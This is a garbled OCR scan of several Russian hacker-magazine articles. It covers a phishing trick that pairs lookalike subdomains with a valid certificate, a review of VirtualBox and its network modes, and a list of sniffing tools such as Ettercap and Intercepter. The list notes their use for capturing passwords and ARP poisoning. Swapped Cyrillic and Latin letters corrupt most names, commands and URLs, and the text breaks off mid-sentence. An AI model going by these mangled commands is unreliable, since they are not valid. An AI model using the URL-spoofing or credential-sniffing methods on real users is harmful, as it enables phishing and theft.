раура1.сот, которое использует ‘а’ из кириллицы и вы- 
глядит как раураі.сот . Что нас не устраивает в такой атаке? 

Ну, во-первых, она ориентирована на один конкретный сайт, 
что ограничивает радиус действия. А во-вторых, браузеры научи- 
лись правильно отображать ГОЫ (Ітегпагіопаіігеб Эотаіп Ыатез 
— Интернационализованные Доменные Имена) и добавляют 
к имени так называемый Рипусобе — префикс «хп~». Фальшивый 
раураі.сот преобразуется в Ьггр: //хп-рура1-4ѵе.сот . 

Итак, мы не можем использовать .сот или любой другой домен 
первого уровня, ибо браузеры добавят к нему Рипусобе. Прики- 
нем, какие символы чаще всего встречаются в 1ЖЦ32] ? Правиль- 
но: «. / & ?». Давай этим воспользуемся. Зарегистрируем домен 
щк.сп и получим сертификат для *.іЦк.сп. А потом применим 
старый трюк с буковками из другого алфавита, очень похожими 
на / и ? для создания фальшивых ІЛИ’ок. Снова запускаем ззІзпііТ, 
только на этот раз, вместо подмены Ьпрз на Ьшр, будем подменять 
ІЛИ на свои липовые поддомены. Так, Ьггр 5 : / /уууууу. ^таіі . сот / 
ассоитз /5 егѵісеЬощп становится ЬггрзѴ/мпАгѵѵщоо^Іе.сот/ 
ассоипщ/ЗегѵісеЬощп? !Т.ііік= . Никакого Рітусобе в последней 
ссылке не наблюдается. Плюс ко всему, мы обладаем действи- 
тельным сертификатом для данного домена. Заметить разницу 
практически невозможно. 
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ТУАЛЬНАЯ 
АШИНА 

ЗАБЕСПЛАТНО 

РЕМ НА ВООРУЖЕНИЕ ПРОГРАММУ 

Если бы год назад мне сказали, что ѴігіиаіВох в скором станет в один 
ряд с такими любимыми нами продуктами, как ѴМѵѵаге или Рагаііеіз, 
я бы, скорее всего, просто рассмеялся. «Интересная, но жутко не- 
путевая, тормозящая и малофункциональная поделка энтузиастов» 
— вот общее впечатление о ѴігІиаІЬох'етого периода. Но то, что в 
апреле я увидел на конференции 5ип ТесЬ Рауз, по вер гл о меня в шок: 
совсем другой продукт! Прямо на месте было решено: во что бы то ни 
стало, о разработке надо рассказать. 



Виртуальные машины я взял на вооружение 
давно и использую их постоянно. Несмотря на 
то, что большую часть времени провожу под 
Виндой, нике мне нужна довольно часто. Нет 
ничего удобнее, чем просто переключиться на 
всегда готовую ОС, запущенную на виртуалке. 
После последнего апгрейда компьютера госте- 
вую систему с Ыпих’ом я даже не выключаю — 
она постоянно висит в памяти. 

Сейчас уже сложно представить, во что бы 
превратилась рабочая система, установи я на 
нее весь софт, с которым приходится иметь 
дело. А операционке под виртуалкой все 
нипочем! Что бы ни происходило, какую бы 
пакость ни натворила только что установлен- 
ная утилита, и какой бы сомнительной дея- 
тельностью ни занималась, ось возвращается 
в работоспособное приложение парой кликов 
мыши — достаточно лишь выбрать нужный 
снимок системы (зпарзЬоі). Трудно найти сред- 
ство мощнее, чтобы в виртуальных условиях 
воссоздать сетевую инфраструктуру любой 
сложности, с нужным количеством хостов на 
различных системах. Провозившись часок, мы 
получаем платформу, на которой легко можно 
потестить новую х-іооіг’у, попробовать само- 



му расковырять сетевой демон, разобраться с 
настройкой сети или подготовиться к экзамену 
для получения престижного сертификата. 
Запускаем на двух виртуалках Васкігаск и 
Оатп ѴиІпегаЫе Ыпих, связываем сеть — и 
используем весь специально собранный 
арсенал пентест-утилит первого дистра на 
специально оставленных багах и уязвимостях 
последнего. Оба дистрибутива, кстати говоря, 
были на нашем прошлом диске. 

Даже не беря в расчет серверные решения, на 
которых виртуализация применяется сплошь и 
рядом, виртуальные машины плотно укрепились 
и на обычных рабочих станциях. Подходящих 
платформ немало. Если не заикаться об ѴѴМѵѵаге 
ѴѴогкзіаііоп, то это — Рагаііеіз ѴѴогкзіаііоп, впол- 
не работоспособная Місгозоіі Ѵігіиаі РС и, нако- 
нец, ѴігІиаІВох. В моем личном хит-параде люби- 
мая «вмвара» долгое время занимала первое 
место. Но что странно: несмотря на большой штат 
сотрудников, новые версии появляются все реже, 
а каких-то революционных решений не видно 
вовсе. Когда-то недосягаемому лидеру теперь не 
просто наступают на пятки, но и по многим фрон- 
там его начинают опережать конкуренты, в чем я 
лично убедился, поработав с ѴіііиаІВох. 



в ЧТО МОЖНО 
ВИРТУАЛИЗИРОВАТЬ? 

Первая версия программы стала публично 
доступна 15 января 2007 года, выйдя из недр 
компании Іппоіек, а уже в феврале 2008 разра- 
ботку приобрела компания 5ип Місгозузіетз. 
Вероятно, это и стало тем волшебным пинком, 
который заставил все механизмы внутри 
ѴігІиаІВох работать, как надо. Со временем 
разработка, изначально ориентированная 
на запуск только ѴѴіпсІоѵѵз и Еіпих, научилась 
запускать самые разные системы, в том числе, 
такие какЗоіагіз, ОрепЗоіагіз и ОрепВЗО. 
Умельцы даже умудряются в качестве гостевой 
ОСи запихнуть Мае 05, правда, используют 
для этого адаптированную для Іпіеі’овских 
процессоров версию НаскіпіозЬ. А 64-битные 
гостевые системы также не проблема, после 
того, как разработка стала поддерживать 
все аппаратные технологии виртуализации, 
которыми снабжаются современные про- 
цессоры. В общем, ѴігіиаіВох стал продуктом, 
который действительно можно использовать. 

К тому же, версии есть для ѴѴіпсІоѵѵз, Еіпих, 
Зоіагіз/ОрепЗоіагіз/МасОЗ X. 

Запустить операционку под ѴігіиаіВох’ом не 
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ГЛАВНОЕ ОКНОѴІВТІІАІ.ВОХ: НА 
НЕЙ ПОДНЯТЫ 4 ВИРТУАЛКИ 



ПОДГОТОВКАКУСТАНОВКЕ 
оиЕ5ТАОоітю№НАивиыти 
9.04, ЗАПУЩЕННОЙ НА ВИРТУ- 
АЛЬНОЙ МАШИНЕ 



си^гЫазыарзноі 
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сложнее, чем просто установить ее на компью- 
тер. А возможно, даже и проще, потому что в 
соседнем окне можно почитывать мануал :]. 
Сам интерфейс программы очень прост. Надо 
постараться, чтобы не суметь найти кнопку 
«Создать», с помощью которой и создается новая 
виртуальная машина. В ходе работы мастера 
необходимо выполнить несколько этапов: 

• выбрать тип операционки и название вирту- 
альной машины; 

• указать размер оперативки, выделенной 
гостевой ОС; 

• создать новый или использовать уже имею- 
щийся виртуальный жесткий диск. 
Единственный нюанс — это тип диска: выби- 
рай сам — или статический, который сразу 
займет все выделенное ему место, или дина- 
мический, файл которого будет расширяться 
по мере необходимости. Заготовка создана, 
теперь переходи в настройки и устанавливай 
различные параметры виртуальной машины. 
Для начала можно примонтировать в качест- 
ве привода 150-образ с дистрибутивом (или 
просто предоставить в распоряжение свой 
СБ/БѴБ-драйв), после чего нажать кнопку 
«Старт» и приступить к установке. 

Если с виртуализацией ты раньше дела не 
имел, то отнесись к виртуалке как обычному 



компьютеру, который теперь работает вн^чри 
стандартного окна системы. Работа гостевой 
системы мало отличается от той же операцион- 
ки, установленной на компе. ѴігіиаіВох поддер- 
живает виртуализацию аудиоустройств. Более 
того, программа реализует виртуальный 115В- 
контроллер, позволяющий подключить произ- 
вольное 115 В -устройство к виртуальной маши- 
не, без необходимости устанавливать драйвера 
на машину-хост. Особенно рекомендую систему 
снепшотов — так называемых сохраненных 
состояний виртуальной машины. К любому из 
снепшотов можно быстро произвести откат из 
любого состояния гостевой системы. Идеальная 
площадка для экспериментов! 

в СЕТЕВЫЕ НАСТРОЙКИ 

Раз уж я заикнулся о том, что на виртуал- 
ках можно воссоздать практически любую 
инфраструктуру, то хочу подробнее коснуться 
настройки сетевых интерфейсов. Еще год 
назад поддержку сети едва ли можно было 
назвать полноценной, но теперь все отлично 
работает. Для каждой виртуальной машины 
может быть установлено до четырех виртуаль- 
ных интерфейсов, но самое главное в том, что 
работать они могут в разных режимах. Режим, 
в котором интерфейс будет функционировать, 



выбирается в свойствах виртуальной машины 
из следующих вариантов: 

• N01 аііасбесі (Не подключен); 

• Ыеіѵѵогк Асісігезз Тгапзіаііоп ( N АТ) ; 

• ВгібдесІ пеіѵѵогкіпд (Сетевой мост); 

• Іпіегпаі пеіѵѵогкіпд (Вн^ренняя сеть); 

• Нозі-опіу пеіѵѵогкіпд (Виртуальная сеть 
хоста). 

По умолчанию, виртуальные сетевые адаптеры 
работают в режиме ЫАТ’а, идеально подходя- 
щем, чтобы предоставить гостевой операцион- 
ной системе простейший доступ в инет (серфинг 
веба, почта и т.д.]. Но отсутствие реального 
ІР-адреса сводит на нет полезность такого режи- 
ма, поэтому во многих случаях лучше использо- 
вать «Сетевой мост». В этом случае виртуальный 
сетевой адаптер получает точно такой же доступ 
в сеть, как и сетевой адаптер машины-хост. 
Например: все мои виртуалки имеют ІР-шники, 
выданные тем же самым БНСР-сервером точки 
доступа, и со стороны разобраться, какие хосты 
— настоящие, а какие — запущены под вир- 
туальной системой, практически невозможно. 
Режим «Вн^ренняя сеть» отлично подходит для 
локальных экспериментов, когда виртуальные 
машины нужно связать в локальную сеть, не 
предоставляя им доступ наружу и к машине- 
хосту. Включить в эту сеть машину-хост позволит 
режим «Виртуальная сеть хоста». 



5УЫ ТЕСН 0АѴ5 2009 



I Неизвестно, когда был еще взглянул на ѴігШаІВох, если бы не попал на конференцию 
5ііп Тесіі Пауз, проходившую в Питере 8-10 апреля. Мероприятие, надо сказать, поража- 
ет масштабами. Увидеть тысячи разработчиков, собранных в одном месте и довольно 
что-то обсуждающих, можно не так-то часто. Люди прилетают и приезжают из разных 
уголков страны, и делают это уже несколько лет подряд. Впрочем, легко понять, что их 
привлекает: за несколько дней они имеют возможность посетить более 45 выступлений 
и практических занятий по самым разным тематикам — премудростям сред ЗипЗшсІіо и 
ЫеіВеапз, настройке орепЗоІагіз, программированию на ІаѵаРх и т.д. Что важно, все до- 
клады читали сами специалисты 5іт, многие из которых прилетели в Питер только с этой 
целью, а на открытии конференции не давал скучать Джит Коул, вице-президент подраз- 
деления клиентского программного обеспечения 5іт Місгозузіетз, Іпс. 

Задень до конференции мне удалось побывать в Питерском офисе Зіт’а. Приятно осо- 
знавать, что это не маркетинговая структура, а самый настоящий центр разработки. 
Несколько сотен программистов трудятся над различными продуктами компании и, в 
том числе, ѴігШаІВох. 



н УДАЛЕННОЕ ПОДКЛЮ- 
ЧЕНИЕ К ВИРТУАЛЬНОЙ 
МАШИНЕ 

Функция, за которую я особенно полюбил 
ѴігШаІВох,— это возможность удаленного под- 
ключения к виртуальным машинам по стандарт- 
ному протоколу РРБ (вернее, его модифициро- 
ванным версиям — ѴРБР, ѴігіиаіВох Ветоіе 
Безкіор Ргоіосоі). Причем, для подключения 
используются стандартные клиенты: виндо- 
вая утилита тзізс или, например, никсовый 
гсіезкіор. Штука просто умопомрачительная: 
можно запустить на хостовой машине сразу 
несколько виртуальных машин, дать к ней пря- 
мой доступ из инета — и полноценно использо- 
вать виртуалки, где бы ты ни находился. 

В свойствах виртуальной машины есть раздел 
«Удаленный дисплей», откуда активируется 
опция «Включить ѴРБР-сервер». Важный 
момент — для каждой конкретной виртуаль- 
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ДЛЯ КАЖДОЙ ВИРТУАЛЬНОЙ МАШИНЫ НЕОБХОДИМО 
УКАЗАТЬУНИКАЛЬНЫЙ ПОРТ — И ИСПОЛЬЗОВАТЬ ЕГО ПРИ 
ПОДКЛЮЧЕНИИ В КРБ-КЛИЕНТЕ 
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МЕБЕАМЬЕББѴѴШООѴ^ІІИЖНОРРО- 



КЛИЕНТА, С ПОМОЩЬЮ КОТОРОГО Я ПОД- 
КЛЮЧИЛСЯ К ВИРТУАЛКЕ С ОЕВІАИ ЬЕМЫУ 




НТТР://ѴѴѴѴѴѴ 

"■ Г 

> Ііпкз 

• Домашняя страница 
ѴігіиаІВох: 
ѵѵѵѵѵѵ.ѵігІиаІЬох.огд . 

• Статьи о ѴВ: 
ШрУ/Ыодз.гип. 
сот/ѴігІиаІВохВигг . 

• Неплохой мануал 
по использова- 
нию консольного 
ѴВохМападе: 
зкопеу.ЫодзроН 
сот/2009/03/ 
ѵігІиаІЬох- 
ѵЬохтападе.ЫтІ . 




> сіѵсі 

Дистрибутив 
Ѵі гІіиаІВох’а, а также 
50К разработчика 
и дополнительные 
утилиты ждут тебя на 
нашем диске. 




ной машины необходимо указать свой уникальный порт, 
иначе одновременно работать с несколькими виртуалками 
не получится. Например, для виртуалки с Виндой можно 
оставить порт по умолчанию 3389 (имей в виду, что он 
может быть занят непосредственно сервером ВОР хостовой 
машины), а для машины с никсами — 3390. 

Стандартный виндовый клиент можно запустить по коман- 
де ітізібс или найти его через меню «Пуск -> Стандартные 
-> Подключение к удаленному рабочему столу». В первый 
раз я долго пытался присоединиться к гостевым ОС, указы- 
вая их собственные ІР (предварительно для них был создан 
сетевой мост, чтобы они вошли в мою обычную локалку) и 
не понимая, почему ничего не работает. Решение оказа- 
лось простым: для подключения необходимо указывать не 
адрес гостя, а ІР-шник хостовой машины с нужным портом! 
Под никсами выполнить подключение не менее просто 
через гбезкЬр, который в любом современном дистрибути- 
ве установлен по дефолту: 

гсіезккор козк_зузкет_ір : рогк 

Другой важный момент, о котором я пока умолчал,— 
настройки авторизации. Самый небезопасный метод — 
полностью отключить процедуру аутентификации, но в 
этом случае доступ к виртуалке получит любой желающий. 
Вместо этого можно выбрать авторизацию через аккаунты 
хостовой системы или аккаунты гостевой системы. Чтобы 
данные было невозможно отснифать, любая РРО-сессия 
шифруется с помощью симметричного РС4 алгоритма 
с 128-битным ключом, который меняется каждые 4096 
отправленных пакетов. 

в ДОПОЛНЕНИЯ 
ГОСТЕВОЙ СИСТЕМЫ 

Неприятный момент в использовании виртуальных машин 
связан с «захватом» ими клавиатуры и мышки. Последние 
работают либо в гостевой ОС, либо в хостовой — осво- 
бодить захваченные виртуалкой манипуляторы можно 
специально назначенной клавишей Нозі: Кеу (правый 
<СТгІ> по дефолту). Переключения туда-сюда, особенно в 
случае нескольких виртуалок, начинают выводить из себя 
уже через несколько минут. Нервные клетки нужно беречь, 
поэтому рекомендую в каждой гостевой ОС установить так 
называемые Оиезі: АсИкіопв. После этого граница между 
окном с гостевой ОС и хостовой системой становится 
прозрачной — ничего не захватывается, а буфер обмена 
становится общим. Если ты работал с ѴМѵѵаге, то должен 
понимать, о чем я говорю — там тот же подход. 

В случае с ѴѴіпсІоѵѵз заинсталить Сиезі: Аббібопз просто, как 
дважды два: надо лишь в меню запущенной виртуальной 



машины выбрать «Устройства Установить Дополнения 
гостевой ОС». В систему при монтируется виртуальный СО, 
с которого быстренько и устанавливается все необходимое. 
В случае с никсами надо помнить, что официально под- 
держиваются дистрибутивы Ребога Соге, Небітаі Епіегргізе 
Ыпих, (ореп]51І5Е, ИбипШ, но в действительности дополне- 
ния устанавливаются и на многие другие туксы. 

Перед установкой настоятельно рекомендую установить 
фреймворк ОКМЗ (Оупатіс Кегпеі Мобиіе Зиррогі:). Под 
ІІЬипШ это делается с помощью команды: 

зисіо арС-деС іпзСаІІ сіктз 

Далее монтируем образ ѴВохбиезіАббкіопз.ізо в качестве 
виртуального СО-драйва, переходим в эту директорию и 
под рутом отдаем команду: 

зЪ. . /ѴВохЬіпихА<і(іікіопз-х8б . гші 

Чтобы перекомпилировать модули ядра на гостевой маши- 
не, делаем: 

/екс/іпіС . сі/ѵЪохас1с1 зекир 

После компиляции остается перегрузить гостевую машину 
и убедиться, что все новые модули нормально работают. 

в РЕЖИМ 5ЕАМІ.Е55 ѴѴІЫ00ѴѴ5 

Установить дополнения для гостевых ОС стоит и ради дру- 
гой классной функции — режима Зеатіезз ѵѵіпбоѵѵз. Что 
это? Если включить опцию, то окна виртуальной машины 
будут отображаться также, как если бы это были окна 
обычной хостовой операционки. В основную систему они 
переносятся одним нажатием клавиши. Все работает 
настолько здорово, что через некоторое время забываешь, 
какое из них на самом деле запущено на виртуальной 
машине. Таскбар гостевой ОС при этом отображается рядом 
с панелью задач привычной хостовой системы. 

Чтобы включить режим Зеатіезз, необходимо нажать на Нозі: кеу 
вместе с «Е» — после чего размер виртуалки будет выставлен в 
соответствии с расширением экрана, окна перенесутся в хосто- 
вую машину, а фон виртуалки будет вырезан. Для возвращения в 
обычный режим используется та же комбинация клавиш. 
Функция довольно специфичная, поэтому работа- 
ет пока только для гостевых ОС на ѴѴіпсІоѵѵз, а также 
ЗоІагіз/ОрепЗоІагіз с сервером Х.огд старше версии 1.3. 

в ОПЦИЯ 5НАРЕ0 Р0ЮЕК5 

Те же самые Оиезі: Аббібопз добавляют еще одну функцию 
— ЗбагесІ ЕоШегз, или общие папки. Вещь очень удобная — 



► 034 
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позволяет физически не расшаривать ресурсы, но примон- 
тировать их в гостевых ОС, как если бы они были доступны 
по сети. Для каждой конкретной виртуалки такие папки 
настраиваются в отдельности — каждая гостевая машина 
будет видеть только то, что ей полагается. Реализуется это 
с помощью специально запущенной службы на хостовой 
системе и файлового драйвера на гостевых ОС. Как сделать 
такую расшаренную папку? На уже запущенной виртуалке 
выбери меню «Устройства -> Общие папки», выбери нуж- 
ные каталоги основной системы, задай им сетевое имя и 
уровень доступа (полный или только для чтения]. Готово! 
Можно примонтировать их под виртуалкой. Под Виндой 
сетевой диск подключается с помощью команды: 

пеС изе х: \\ѵЬохзѵг\з]іагепате, где х: — буква 
для сетевого диска ѵЬохзѵг — фиксированное 
имя, обозначающее хост-машину 
зЬагепате — название папки, которое ты ука- 
зал в момент создания общей папки 

Под Ыпих’ом все то же самое выполняется командой: 

тошіб -б ѵЬохзб [ — о ОРТТСЖ8] зйагепате 

тоипфоіпі: 

в ПОДДЕРЖКА 30 в ГОСТЕВЫХ ОС 

Одной из интереснейших фич, которую в Питере лично показы- 
вали разработчики ѴіііиаІВох’а — это поддержка 30 в гостевых 
системах на базе Винды и тукса. Благодаря этой новой функции, 
программе не приходится больше эмулировать 30-ускорение 
внутри виртуальной машины (что дико медленно] — вместо этого 
ѴігШаІВох использует графический процесс хостовой машины, 
причем не важно будь та на ѴѴіпсІоѵѵз, І_іпих, Мае, Воіагіз. Короче 
говоря, СиакеЗ на виртуальной машине или полюбившиеся 
многим эффекты СотрШа под линуксом — теперь вполне нор- 
мальное явление. Работает это реально хорошо. Удалось достичь 
подобного результата за счет дополнительного 30-драйвера, 
который устанавливается вместе с Оиезі: АсІсІШопз в гостевую ОС 
и выполняет роль своеобразного посредника. Когда какое-то 
приложение (например, старая добрая квака] в гостевой системе 
пытается воспользоваться аппаратным ускорением ЗБ через 
интерфейсы ОрепѲІ, соответствующие вызовы передаются на 
хостовую систему по организованному ѴіііиаІВох’ом туннелю, 
где успешно и выполняются. Пока, правда, функция считается 
экспериментальной и поэтому, по умолчанию, в настройках 
виртуальной машины отключена. На текущий момент под- 
держивается только ОрепОІ_-ускорение, однако, ОігесКЮ 
разработчики обещают уже в будущих релизах. 

в УПРАВЛЯЕМ ВМ ЧЕРЕЗ КОНСОЛЬ! 

Поддержка любых сетевых конфигураций, удаленный 
доступ через РШР — что еще может потребоваться гику? 



Я отвечу: автоматизация! К счастью, в ѴігШаІВох никто 
не обязывает тебя использовать СІЛ-интерфейс. Любые, 
подчеркиваю — любые, действия можно выполнить через 
консольную утилиту администрирования ѴВохМападе.ехе и 
использовать в своих сценариях. 

Можешь попробовать ввести команду «ѴВохМападе Изб 
ѵпп5» — получишь в консоли список всех существующих 
виртуальных машин, их имена и идентификаторы ІІІІЮ: 

с:\Ргодгат Рі1ез\8ип\хѴМ 
ѴігбиаІВох>ѴВохМападе . ехе Іізб ѵтз 
ѴігбиаІВох Соішіапб Ьіпе Мападешепб Іпбегбасе 
Ѵегзіоп 2.2.0 

(С) 2005-2009 8ип Місгозузбетз , Іпс . 

АІ1 гідЬбз гезегѵеб. 

"ѵЛ7 " {7П5е0ббЬ-бее2-4984-аб22-а113Ьбб7еб4б } 
"хр" {778б2а40-бсе8-4519-97бб-9с4с0бб797с4} 
"иЪ" {абсб8б97-3883-48с1-8е1б-4бае39бс2ббс} 

Хочешь запустить одну из них? Отдаем соответствующую коман- 
ду, указав имя нужной виртуалки: «ѴВохМападе.ехе зФііѵпп ѵѵ7». 
Словом, через эту консольную утилиту ты можешь сделать абсо- 
лютно все: тулза с радостью расскажет, какие команды и как 
использовать, если ты запустишь ее без параметров. 

Впрочем, кого и такой вариант не устраивает, еще 
больше интеграции с ѴігШаІВох’ом можно достичь 
с помощью открытого АРІ программы. Благодаря 
вызовам, которые хорошо документированы в 50К, 
разработчик получает полный контроль над движ- 
ком виртуализации. В качестве примера, когда 
разработчик воспользовался открытым АРІ, стоит 
привести утилиту ВохѴтБегѵісе ( ЬирѴ/зоигсеФгде. 
пе1:/рго]есІ:5/ѵЬохѵпп5егѵісе ]. Ее цель — позволить 
администратору грамотно запустить ѴігШаІВох в виде 
ѴѴіпсІоѵѵз-сервиса. Слово «грамотно» означает, что 
виртуальные машины должны стартовать прямо в 
момент загрузки Винды (еще до логина пользователя 
в системе], и вместе с ней же корректно завершать 
работу. К сожалению, проект ныне не поддерживается, 
однако, по-прежнему является вполне работоспособ- 
ным. Кстати, этот же разработчик очень скоро обещает 
выпустить первую версию другого своего проекта — 
ѵЬохѴѴеЬАбппіп для управления виртуальными машина- 
ми через веб-интерфейс. 

н ПОСЛЕДНИЙ ТРИК 

Я не упомянул еще одну изюминку проекта. ѴігШаІВох 
абсолютно бесплатен и, более того — часть его исходников 
открыта! Поэтому, если ты еще не успел пощупать виртуа- 
лизацию своими руками или наоборот являешься давним 
и закоренелым пользователем той же ѴМѵѵаге ѴѴогкзФбоп, 
всячески рекомендую тебе попробовать ѴВ. □с 




> іпіо 

• Поднятые вир- 
туальные машины 
не составиттруда 
запустить на другом 
компьютере. Нужно 
лишь экспортировать 
конфигурацию в файл 
специального фор- 
мата 0ѴР (открытый 
формат виртуали- 
зации] через меню 
«Файл -^Экспорт 
конфигурации». 

В ходе процедуры 
скопируется и вирту- 
альный жесткий диск 
с файлами. 




• Процедура ми- 
грации сдругого 
продукта сильно 
упрощена за счет 
того, что ѴігШаІВох 
поддерживает об- 
разы жестких дисков 
ѴМБК (ѴМѵѵаге] иѴНО 
(Місгозоіі ѴігШаІ РС]. 
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У каждого из команды т свои предпочтения по части софта и утилит 
для пен-теста. Посовещавшись, мы выяснили, что выбор так разнит- 
ся, что можно составить настоящий джентльменский на боризп ро- 
вере иных программ. На том и решили. Чтобы не делать сборную со- 
лянку, весь список мы разбили на темы — и в этот раз коснемся утилит 
для снифинга и манипулирования пакетами. Пользуйся на здоровье. 



ѴѴІКЕ5НАКК 

ѴѴѴѴѴѴ.ѴѴІВЕ5НАКК.0КС 

*ЫІХ, ѴѴІШ0ѴѴ5 

Фантастически успешный анализатор пакетов 
для винды и никсов, который многие помнят и 
даже по-прежнему называют ЕШегеаІ (новое 
имя появилось лишь с лета 2006 года]. ѴѴігезЬагк 
«на лету» анализирует трафик из локальной сети 
или из заранее подготовленного дампа на диске. 
То, насколько он удобен — выше всяческой 
похвалы: ты можешь свободно перемещаться по 
всей отснифанной инфе, просматривая данные 
в той детализации, которая тебе нужна. Главные 
козыри — это автоматический разбор пакетов на 
определенные для данного протокола понятные 
поля, а также система фильтров, избавляющая 
от просмотра всего подряд, которая отобра- 
жает лишь то, что тебя может заинтересовать. 
Последние версии ѴѴігезЬагк радуют продви- 
нутыми механизмами для анализа голосового 
трафика ѴоІР, а также дешифровкой таких про- 
токолов как ІРзес, І5АКМР, КегЬегоз, ЗЫМРѵЗ, 
55І_ЯІ_5, ѴѴЕР, и ѴѴРА/ѴѴРА2. На лету расшиф- 



ровываются и данные, сжатые дгір’ом. Снифер 
может работать не только в ЕіФегпеГ но и ІЕЕЕ 
802.11, РРР/НОЕС, АТМ, ВІиеФоШ, 115В, Токеп 
Ріпд, Егате Реіау РОО\ сетях. Инструмент опре- 
деленно один из лучших! Даже если у тебя есть 
дамп другого снифера, не поленись скормить 
его ѴѴігезЬагк’у — никогда не будет лишним 
воспользоваться такими умопомрачительными 
возможностями. 

ТСРОЫМР 

ѵѵѵѵѵѵ.тсроимр.окб 

*ЫІХ, ЕСТЬ ПОРТ под 
ѴѴІШ0ѴѴ5 

Название этого снифера знакомо каждому. 

Еще бы: до появления на сцене ЕіЬегеаІ’а 
(ѴѴігезЬагк) он считался стандартом де-факто, 
да и теперь многие по привычке используют 
его, вполне радуясь жизни. Да, у него нет 
классного 0111-интерфейса и возможности 
автоматически распарсить данные популярных 
протоколов, но это, в любом случае, отличное 
средство, чтобы отснифать в локалке трафик и 



получить вожделенный дамп данных. Вообще, 
более неприхотливого средства, пожалуй, не 
найти: и это, отчасти, хорошая сторона того, 
что новые возможности в нем практически не 
появляются. К тому же, в отличие оттого же 
ѴѴігезЬагк, Тсрбитр может похвастать куда 
меньшим количеством проблем с безопасно- 
стью и просто багов. Многие мои знакомые 
админы успешно юзают этот снифер для 
мониторинга активности и решения самых 
различных сетевых проблем. Исходные коды 
ТСРОитр частично используются библиотека- 
ми ЫЬрсар/ѴѴіпРсар, предназначенными для 
перехвата пакетов и используемыми извест- 
ным сканером птар и другими тулзами. 

ЕТТЕКСАР 

ЕТТЕКСАР.501ЖСЕР0КСЕ.МЕТ 

ПЛАТФОРМА: *ЫІХ, 
ѴѴІШ0ѴѴ5, МАО 05 

Помнится, когда мы впервые рассказывали 
об АРР-спуфинге (приеме, позволяющем сни- 
фать трафик в локальных сетях, построенных 
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КОЗЫРИ ѴШЕ5НАКК 




РАЗРАБОТКА ЕТТЕКСАР БОЛЬШЕ 
НЕ ВЕДЕТСЯ, НО ФУНКЦИОНАЛЬ- 
НОСТЬ ВСЕГДА МОЖНО НАРАС- 
ТИТЬ С ПОМОЩЬЮ ПЛАГИНОВ 



на считах], то в качестве снифера применяли 
именно Ейегсар. Сами разработчики продви- 
гают свой продукт как средство для соверше- 
ния атак тап-іп-іЬе-тісІсІІе. Утилита поддер- 
живает снифинг в реальном времени, фильт- 
рацию контента «на лету», инжекцию пакетов 
и многие другие интересные трики. Учти, что 
по дефолту программа выполняет множество 
лишних действий (например, сіпз-резолвинг 
найденных адресов). Кроме того, активный 
агроізопіпд и некоторые другие действия могут 
скомпрометировать хакера, использующего 
еііегсар. Если точнее, то даже в самой про- 
грамме встроена функция обнаружения себе 
подобных :). В ЕКегсар предусмотрена возмож- 
ность проверки, находишься ли ты в локалке 
со свитчами или нет (сейчас это уже почти 
не актуально], а также встроено средство для 
йпдегргіпЕа, которое активными и пассивными 
методиками может определить разные девай- 
сы, операционки на хостах и общую схему сети. 

0Х4553-ІІЧТЕВСЕРТЕВ 

ІМТЕВСЕРТЕВ.МЕВР.ВІІ 

ПЛАТФОРМА: ѴѴІ N 00ѴѴ8 
ЫТ(2К\ХР\2КЗ\ѴІ5ТА) 

А вот и отечественная разработка — снифер 
Іпіегсеріег. И по совместительству — гвоздь про- 
граммы! Это одна из самых прогрессивных ути- 
лит для перехвата трафика, сообщений и паро- 
лей/хешей, доступных в публичном доступе. Что 
умеет? В первую очередь, перехватывать пароли 
и хеши для следующих протоколов: ІСО, ІПС, 

АІМ, ЕТР, ІМАР, РОРЗ, 5МТР, ШАР, ВІ\ІС, 50СК5, 
НТТР, І\ІІ\ІТР, СѴ5, ТЕЫМЕТ, МРА, 0С++, ѴЫС, 
МѴ5СИ, ОВАСЬЕ. Другой важный функционал 
— перехватывает самые различные сообщения 
с отображением диалога в реальном времени. 

На текущий момент снифером переваривают- 
ся следующие протоколы: ІСО, АІМ, ЗАВВЕР, 
УАНОО, М5І\І, бАОи-ОАОи, ІРС, МВА. Но этот 
список не главное, ведь Іпіегсеріег — чуть ли не 
единственный инструмент, поддерживающий 
уникод, а потому правильно отображает кирил- 
лицу там, где это необходимо! Да и чего таить, 
приведенный список едва ли можно назвать 
полным, потому как перехватываются еще 
сообщения СТаІк (протокол построен на ЧабЬег], 
а также МаіІ.Агент, что может быть весьма акту- 
ально. В арсенале 0х4553-ІпІегсер1:ег имеется 



множество убийственных технологий: чего стоит 
один только «еХіхете тобе». Сниферу доста- 
точно задать целевой протокол без указания 
порта — 0x4553 - 1 піе гее ріе г будет просматривать 
весь трафик и автоматически «вылавливать» 
пакеты, относящиеся к данному протоколу (путем 
анализа их содержимого]. Эта фича полезна для 
выявления Ргоху- и ЕТР-серверов (остальные 
сервисы работают с более или менее пред- 
сказуемыми портами). Так или иначе, можно 
просмотреть весь трафик в чистом (гаѵѵ] виде, но 
и здесь можно облегчить себе жизнь, наложив 
на отображаемый контент некоторые правила. 
Награбленный трафик может быть сохранен в 
рсар-формате (стандарт де-факто среди сниффе- 
ров] и подвергнут дальнейшему анализу, напри- 
мер, в ѴѴігезбагк. К тому же, сам снифер имеет 
все задатки для оЖіпе-анализа. Поддерживается 
возможность удаленного захвата трафика 
посредством РРСАР-демона, обычно устанав- 
ливаемого на шлюз локальной сети и грабящего 
весь трафик на входе/выводе во «внешний» 
мир. Поскольку шлюзы нередко вращаются под 
управлением Ыпих’а или хВЭО.то РРСАР-демон 
оказывается весьма полезным подспорьем. 
Помимо чисто сниферных функций, 0x4553- 
Іпіегсеріег обладает набором весьма соблазни- 
тельных фич. Начнем с банального обнаружения 
узлов в сети, которое осуществляется отнюдь 
не тупым сканированием ІР-адресов. В нужном 
диапазоне. 0x4553-1 піегееріег посылает широко- 
вещательный АРР-запрос, требуя, чтобы все 
узлы, которые его получили, сообщили свои 
ІР-адреса. Причем, 0x4553-1 піегееріег способен 
выявлять другие сниферы. ОНСР 0І5С0ѴЕПѴ 
позволяет осуществить поиск ОНСР-серверов. 
Интегрированный перепрограмматор МАС- 
адресов позволяет быстро поменять МАС-адрес. 
Я уже не говорю о модуле АРР Р0І30ІЧ — это 
само собой разумеющееся. 

ИЕТСАТ 

МЕТСАТ.501ІВСЕР0В6Е.МЕТ 

*ЫІХ, ЕСТЬ ПОРТ ПОД 
ѴѴІШ0ѴѴ5 

Своеобразный швейцарский нож любого взлом- 
щика. Эта чрезвычайно простая утилита позво- 
ляет читать и писать данные в ТСР и ЦЮР соеди- 
нениях. Иными словами, ІМеІсаІ: позволяет тебе 
соединиться с чем угодно, да и делать что угод- 



